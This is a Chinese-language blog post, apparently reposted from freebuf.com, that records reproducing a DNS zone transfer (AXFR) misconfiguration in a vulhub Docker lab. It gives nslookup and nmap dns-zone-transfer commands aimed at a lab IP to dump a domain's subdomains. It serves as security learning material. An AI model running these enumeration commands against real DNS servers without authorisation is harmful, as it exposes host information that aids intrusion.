DNS Zone Transfers(DNS区域传输)是指一台备用服务器使用主服务器的数据来刷新自己的域数据库,其目的是为了防止主域名服务器因意外故障尔影响到整个域名的解析。当主服务器出现故障时,备用服务器就会顶替主服务器而提供域名解析服务。当DNS服务器被错误设置成只要有client发出请求,就会向对方提供一个z域数据库的详细信息时,就产生了DNS域传送漏洞。通过该漏洞,测试人员可以快速收集某个特定域信息,主机信息。
本文仅作漏洞复现记录与实现,利用流程如下:
1.漏洞信息
本环境使用vulhub进行搭建,依次执行以下命令完成搭建
cd vulhub/dns/dns-zone-transfer/ docker-compose up -d
稍等片刻就可以看到开启了udp与tcp协议的53端口
目标: 192.168.101.152:53
2.利用流程
在Windows使用nslookup工具,依次执行以下指令
nslookup set type=soa server 192.168.101.152 ls -d vulhub.org
可以看到,成功获取到了vulhub.org的所有子域名
也可以使用nmap进行扫描
nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=vulhub.org" -Pn -p 53 192.168.101.152
到此文章结束
来源:freebuf.com 2021-03-27 18:37:02 by: FengDao
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册